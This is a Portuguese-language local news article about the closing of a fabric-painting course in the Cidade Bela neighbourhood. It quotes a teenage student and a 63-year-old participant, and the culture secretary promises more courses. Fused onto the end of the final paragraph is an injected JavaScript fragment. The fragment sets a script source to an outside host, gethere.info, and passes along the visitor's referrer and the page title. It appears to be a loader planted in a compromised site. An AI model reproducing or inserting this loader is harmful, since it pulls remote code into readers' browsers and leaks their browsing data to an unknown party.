Capa / Cidades / Encerramento de curso de pintura em tecido mostra habilidades das alunas

Encerramento de curso de pintura em tecido mostra habilidades das alunas

encerramento-de-curso-de-pintura-em-tecido-mostra-habilidades-das-alunas6 Foi encerrado ontem 24, o curso de pintura em tecido, na associação de moradores do bairro Cidade Bela-AMOCIB. O curso teve mais de 50 alunas distribuídas entre os bairros Cidade Bela e Vila Nova e foi realizado pela Secretaria de Cultura e Juventude.

As pinturas em panos de prato expostas no encerramento do curso, demonstram qualidade e beleza sem igual e também que as participantes têm o dom para a tarefa, além de hobby a técnica de pintura em tecido é utilizada para a aquisição de uma renda extra.

A adolescente Emilly Nayra participa há dois anos do curso e apesar de ter entrado por hobby, até já faturou uma renda extra. “Para mim o curso é importante porque a gente consegue ter o dinheiro próprio e consegue fazer as coisas que a gente quiser e até comprar mais panos e materiais, eu gosto bastante de participar e mudou bastante coisa na minha vida porque antes eu precisava pedir as coisas para minha mãe, e dinheiro e agora eu posso comprar o que eu precisar, eu já lucrei R$ 275,00”, declarou.encerramento-de-curso-de-pintura-em-tecido-mostra-habilidades-das-alunas

Além de profissão e hobby o curso de pintura é utilizado para fins de saúde, é o caso da aluna Maria do Rozário, 63 anos. “Mudou bastante porque quando eu comecei eu estava com muitos problemas de saúde, pressão alta e nada controlava e depois que eu comecei a fazer o curso tudo melhorou, eu ficava muito sozinha em casa e a hora que eu venho para cá é muito bom”, atesta.

A secretaria de Cultura Arisne Campos, garantiu que novos cursos serão realizados, mas que a previsão é para o próximo ano.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top